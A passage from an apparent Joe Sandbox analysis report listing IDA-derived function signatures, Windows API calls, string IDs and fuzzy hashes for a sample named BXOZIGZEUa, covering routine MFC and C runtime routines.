                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3
                                                                  • String ID: %sMFCToolBarParameters$LargeIcons
                                                                  • API String ID: 431132790-2076908790
                                                                  • Opcode ID: 2e074d1072bed5c67256f90f679f2c7e7a4db6f3912b6dafd73902abcfd0b941
                                                                  • Instruction ID: 2357a2544502407e2c40b0d1d2bffaea5b9c6ea6b42f33c62b81a5d677f6a81e
                                                                  • Opcode Fuzzy Hash: 2e074d1072bed5c67256f90f679f2c7e7a4db6f3912b6dafd73902abcfd0b941
                                                                  • Instruction Fuzzy Hash: BF219F70A00245EFCF15EFA5C885FEDBBB4AFA4714F144059F5069B292DB719A40CB91
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 001FC8FC
                                                                  • SendMessageW.USER32(00000000,00000085,00000000,00000000), ref: 001FC934
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: MessageRectSendWindow
                                                                  • String ID: 2
                                                                  • API String ID: 2814762282-3001879987
                                                                  • Opcode ID: 588529ba47faa3561993cb5592c758a12f3f4a8042980719a334fce9bdae8285
                                                                  • Instruction ID: 5016e988275b6852e8cba6681c1559ec72a6b1963e510e84ee553053f67dee36
                                                                  • Opcode Fuzzy Hash: 588529ba47faa3561993cb5592c758a12f3f4a8042980719a334fce9bdae8285
                                                                  • Instruction Fuzzy Hash: 90117075A00208ABCB11ABA6DC4ADAFFBB9FFD9700F10056EF506A2251DF705A00DF61
                                                                  APIs
                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 001C7966
                                                                    • Part of subcall function 002D858E: std::exception::exception.LIBCMT ref: 002D85A3
                                                                    • Part of subcall function 002D858E: __CxxThrowException@8.LIBCMT ref: 002D85B8
                                                                    • Part of subcall function 002D858E: std::exception::exception.LIBCMT ref: 002D85C9
                                                                  • _memmove.LIBCMT ref: 001C799F
                                                                  Strings
                                                                  • invalid string position, xrefs: 001C7961
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                  • String ID: invalid string position
                                                                  • API String ID: 1785806476-1799206989
                                                                  • Opcode ID: 4dc1e980384776cc2d507f9ec7bf2748f1b83eade440c47261f104eb315980f7
                                                                  • Instruction ID: 3438f16d67d20a15c128f960f47546791369d9b07657afe1a2da1a31084e86a4
                                                                  • Opcode Fuzzy Hash: 4dc1e980384776cc2d507f9ec7bf2748f1b83eade440c47261f104eb315980f7
                                                                  • Instruction Fuzzy Hash: 3501DB313042414BD72589ACDC90E7AF7AAEBA4764B24492DD1C5C7785D7F1DC418BA4
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Show
                                                                  • String ID: `2
                                                                  • API String ID: 990937876-2259872102
                                                                  • Opcode ID: 0f926402c5697c0775c66e4ca858f65bd8eaae1456366bf95b6a24720ce5fb09
                                                                  • Instruction ID: 13e929d2931899ae1ecf0d6772c6e09aacfa8c613bbe823eeba3dcde0de35068
                                                                  • Opcode Fuzzy Hash: 0f926402c5697c0775c66e4ca858f65bd8eaae1456366bf95b6a24720ce5fb09
                                                                  • Instruction Fuzzy Hash: 1B01B1322517525BFB115E299CC5F67BBADFF90724F590028E9089B282DB38EC118AA1
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: CopyInfoMonitorRect
                                                                  • String ID: (
                                                                  • API String ID: 2119610155-3887548279
                                                                  • Opcode ID: 94437652a4528207e651d75680d4e4f831e20d3b81887c06f6fc154e3c868bde
                                                                  • Instruction ID: 2d66e78b6d5bf7474169a37cb545ac3f0fde76d0f60ec439be23b9a89ac11ab2
                                                                  • Opcode Fuzzy Hash: 94437652a4528207e651d75680d4e4f831e20d3b81887c06f6fc154e3c868bde
                                                                  • Instruction Fuzzy Hash: B7119A71A006099FCB50DF99D585E9EBBF5EB18310B508869E45AE7610DB30FD41CFA1
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,00000000), ref: 00215EEC
                                                                  • PtInRect.USER32(00000000,00000000,00000000), ref: 00215EFC
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Exception@8H_prolog3ThrowWindow
                                                                  • String ID: 83/
                                                                  • API String ID: 1945185285-2323854675
                                                                  • Opcode ID: 930c063fe2e553d0d238f1d0d63f95286830229c2ee5c9f1ad4ad8e16df4bdb7
                                                                  • Instruction ID: ab3cbff3d4c1620cf5a81e522c1b541c41ed4a6151e8f5ca1964f64ad8adcc6b
                                                                  • Opcode Fuzzy Hash: 930c063fe2e553d0d238f1d0d63f95286830229c2ee5c9f1ad4ad8e16df4bdb7
                                                                  • Instruction Fuzzy Hash: 8501D632920619EFCB11DF94C844BEEB7F4FF64365F250069E805A7141DB70DE558B90
                                                                  APIs
                                                                    • Part of subcall function 001D8C1E: GetModuleHandleW.KERNEL32(?,?,001DE796), ref: 001D8C2C
                                                                    • Part of subcall function 001D8C1E: LoadLibraryW.KERNEL32(?,?,001DE796), ref: 001D8C3C
                                                                  • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 001DE79C
                                                                  • _memset.LIBCMT ref: 001DE7B5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleLibraryLoadModuleProc_memset
                                                                  • String ID: DllGetVersion
                                                                  • API String ID: 3385804498-2861820592
                                                                  • Opcode ID: dd3b88df1e94035156ba4aa4b3a3976ccd2653f881e2101f2ff959555105b37c
                                                                  • Instruction ID: 8e2dd2377e4e48c728655b36f6aa347a52c826f105da187a2ca84d48100448a3
                                                                  • Opcode Fuzzy Hash: dd3b88df1e94035156ba4aa4b3a3976ccd2653f881e2101f2ff959555105b37c
                                                                  • Instruction Fuzzy Hash: F201B171A00219ABD750EBBDDC81BEE77F8AB08754F500136FA05E7291EB709C058BE0
                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 001C9761
                                                                  • PathFindExtensionW.SHLWAPI(?), ref: 001C9777
                                                                    • Part of subcall function 001C9583: GetProcAddress.KERNEL32(00000000,GetThreadPreferredUILanguages), ref: 001C95C8
                                                                    • Part of subcall function 001C9583: _memset.LIBCMT ref: 001C95F4
                                                                    • Part of subcall function 001C9583: _wcstoul.LIBCMT ref: 001C963C
                                                                    • Part of subcall function 001C9583: _wcslen.LIBCMT ref: 001C965D
                                                                    • Part of subcall function 001C9583: GetUserDefaultUILanguage.KERNEL32 ref: 001C966D
                                                                    • Part of subcall function 001C9583: ConvertDefaultLocale.KERNEL32(?), ref: 001C9694
                                                                    • Part of subcall function 001C9583: ConvertDefaultLocale.KERNEL32(?), ref: 001C96A3
                                                                    • Part of subcall function 001C9583: GetSystemDefaultUILanguage.KERNEL32 ref: 001C96AC
                                                                    • Part of subcall function 001C9583: ConvertDefaultLocale.KERNEL32(?), ref: 001C96C8
                                                                    • Part of subcall function 001C9583: ConvertDefaultLocale.KERNEL32(?), ref: 001C96D7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Default$ConvertLocale$Language$AddressExtensionFileFindModuleNamePathProcSystemUser_memset_wcslen_wcstoul
                                                                  • String ID: %s%s.dll
                                                                  • API String ID: 1415830068-1649984862
                                                                  • Opcode ID: 0a6c9797f556261db7755dfeaab104a92831fbc35bf70a11a6c5e900e4a52c54
                                                                  • Instruction ID: d9fb90eed1cc43ff52f43063b9c8d3549eec92203834f869ce5c17626f0a4731
                                                                  • Opcode Fuzzy Hash: 0a6c9797f556261db7755dfeaab104a92831fbc35bf70a11a6c5e900e4a52c54
                                                                  • Instruction Fuzzy Hash: 9E016271911218ABCB11DFA4EC89EEF77ADEF49300F0504A9A509EB051EA71DA458F90
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 001EBAE4
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000585,00000000), ref: 001EBB14
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ParentRedrawWindow
                                                                  • String ID: To/
                                                                  • API String ID: 3969678505-3711964495
                                                                  • Opcode ID: d247f8243066cf00589631036109325617b9f798b51df7f8d69d50f310c8da32
                                                                  • Instruction ID: 69b584ab6af6e44bdc7d061860c8bc1a8663fa5099ca7097c4b6488fde8d05b6
                                                                  • Opcode Fuzzy Hash: d247f8243066cf00589631036109325617b9f798b51df7f8d69d50f310c8da32
                                                                  • Instruction Fuzzy Hash: 7F01DF32304B40ABDB18AB26ED85F2F77EABFE4700F120429F55A87291DF70E8008B54
                                                                  APIs
                                                                  • _strcpy_s.LIBCMT ref: 002C637B
                                                                  • __invoke_watson.LIBCMT ref: 002C63CF
                                                                    • Part of subcall function 002C620A: _strcat_s.LIBCMT ref: 002C6229
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: __invoke_watson_strcat_s_strcpy_s
                                                                  • String ID: -g,
                                                                  • API String ID: 312943863-3618676002
                                                                  • Opcode ID: b4baa15f2154b6c698d56b0502d95028cb3e23974111dbf4b9ddce4dbb627a85
                                                                  • Instruction ID: edc4186fa65d6175446852e3f29a0007064eab3a5ada124e886dc56fb966d83d
                                                                  • Opcode Fuzzy Hash: b4baa15f2154b6c698d56b0502d95028cb3e23974111dbf4b9ddce4dbb627a85
                                                                  • Instruction Fuzzy Hash: C1F0C2B25403497FCF116E90CC06F963F5AAB01750F458265FE1946052E3328D74DB90
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Parent
                                                                  • String ID: `2
                                                                  • API String ID: 975332729-2259872102
                                                                  • Opcode ID: 7bc4960d16135c6639e72231cf7ce07e32a74f977f237f8ea1a250b271b4d76c
                                                                  • Instruction ID: 1a41edbb421b9886c1e8f6244cb7e8f800913e6e53e57c4981706839e161668c
                                                                  • Opcode Fuzzy Hash: 7bc4960d16135c6639e72231cf7ce07e32a74f977f237f8ea1a250b271b4d76c
                                                                  • Instruction Fuzzy Hash: 70F0F6B2900215E7CB316767AC45E9F76EDEFA4321B210926F804A7200DB24DC10C594
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00239AC4
                                                                  • RegisterClipboardFormatW.USER32(00000010), ref: 00239B0D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ClipboardFormatH_prolog3Register
                                                                  • String ID: ToolbarButton%p
                                                                  • API String ID: 1070914459-899657487
                                                                  • Opcode ID: 9de09840c185cedaa64d9d30c88fb39bea9b8fb49a80b17e79a6f7b19a23ccab
                                                                  • Instruction ID: 1ff7ff7052dd08f69a90745dc2b481bc4a019d2ea64cdecdeec78ef2ddd7d039
                                                                  • Opcode Fuzzy Hash: 9de09840c185cedaa64d9d30c88fb39bea9b8fb49a80b17e79a6f7b19a23ccab
                                                                  • Instruction Fuzzy Hash: D6F022708202059BCF02FF64EC86BADB368FF21314F049409F181632A2DFB09959CB65
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 002936E8
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00293721
                                                                    • Part of subcall function 001C94E4: ActivateActCtx.KERNEL32(?,?,0031BB48,00000010,001C95B9,KERNEL32.DLL), ref: 001C9504
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ActivateAddressH_prolog3Proc
                                                                  • String ID: UxTheme.dll
                                                                  • API String ID: 323876227-352951104
                                                                  • Opcode ID: 704edf1d3e70b3b50bc1c7b7ae0c0321c8232b419593d3e8b3e144ab6fc73dec
                                                                  • Instruction ID: 3c7f59ca434651f3657c6de6f2aeb06904e55151c69df9b7200d9fb8af0392a8
                                                                  • Opcode Fuzzy Hash: 704edf1d3e70b3b50bc1c7b7ae0c0321c8232b419593d3e8b3e144ab6fc73dec
                                                                  • Instruction Fuzzy Hash: D6E06DF16642459BDF269FA5AC85BD97BDCBB14750F054048F805DB391CB30DB608B44
                                                                  APIs
                                                                  • __CxxThrowException@8.LIBCMT ref: 001CFC77
                                                                    • Part of subcall function 002BF7E9: RaiseException.KERNEL32(001CA2E2,?,00000000,?,001CA2E2,?,?,001C106C,00000000), ref: 002BF82B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionException@8RaiseThrow
                                                                  • String ID: 33$33
                                                                  • API String ID: 3976011213-2126567973
                                                                  • Opcode ID: 20119dd6927fc32f80cd3e391fcc1978ac66655c7dc669a81950f93ce524cff5
                                                                  • Instruction ID: f9b67d6be778a571c1e21bfdc00c87789631577f783b307de2035376a007f2de
                                                                  • Opcode Fuzzy Hash: 20119dd6927fc32f80cd3e391fcc1978ac66655c7dc669a81950f93ce524cff5
                                                                  • Instruction Fuzzy Hash: 90D05E3600420CBB4744A682DD46CCBBBACDA90760F208016F11442101AEB2AE2096A0
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(00333728,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D6230
                                                                  • InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D6242
                                                                  • LeaveCriticalSection.KERNEL32(00333728,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D624F
                                                                  • EnterCriticalSection.KERNEL32(?,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D625F
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                                                                  • String ID:
                                                                  • API String ID: 2895727460-0
                                                                  • Opcode ID: 7f41f85e15efdb8ac8dfe30aaf0ca92789b6df18d2511d52295f0585edb5d2b8
                                                                  • Instruction ID: 46819b446d9151352014e09b61b710fa4e9ad3a17a906f160b411bf02b44cb92
